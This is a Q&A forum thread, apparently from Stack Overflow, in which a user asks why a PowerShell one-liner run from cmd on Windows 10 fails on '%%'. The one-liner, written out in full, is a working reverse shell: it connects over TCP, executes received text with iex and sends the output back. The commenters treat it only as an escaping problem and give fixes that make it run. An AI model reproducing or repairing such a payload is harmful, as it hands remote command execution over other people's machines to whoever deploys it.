# Powershell The term '%%' is not recognized as the name of a cmdlet

Tags: windows-10, powershell, error-logging

I run this code on cmd on win 10

> powershell.exe -Command "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

but i get this error

> %% : The term '%%' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the
>   spelling of the name, or if a path was included, verify that the path is correct and try again.
>   At line:1 char:127
>   + ... 3);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};whil ...
>   +                                                                ~~
>       + CategoryInfo          : ObjectNotFound: (%%:String) [], CommandNotFoundException
>       + FullyQualifiedErrorId : CommandNotFoundException

Exception calling "Read" with "3" argument(s): "Value cannot be null.
Parameter name: buffer"
At line:1 char:140
+ ... 5535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) ...
+                       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ArgumentNullException
Any ideas why It says that?
I saw some tutorials and it works good on them

Comment: Not entirely sure, but %% can be interpreted as % on commandline and I think that's the problem.

Comment: So I replace %% with %?

Comment: Or try %%%%. Because then it are 2 % signs being parsed. Also, you did not actually include the error.

Comment: I forgot, now i Included

Comment: https://www.robvanderwoude.com/escapechars.php < this one has the answer. To escape one %, you write %%. So it should be %%%%.

Comment: It doesnt work with %%%% either
puts another errr

Comment: **In batch files**, the percent sign may be "escaped" by using a double percent sign ( `%%` ). From `cmd` prompt, leave the only `%`. I'd use full cmdlet name `ForEach-Object` instead of the `%` alias as an universal rule.

Comment: How? I dont understand

Comment: Born vs. Me - JosefZ stated basically to use `[byte[]]$bytes = 0..65535|ForEach-Object{0};` just like that for that part of the logic and stop using the `%` sign character entirely to ensure that you are not having an issue with that. It will iterate the 65000+ zeros for you either way.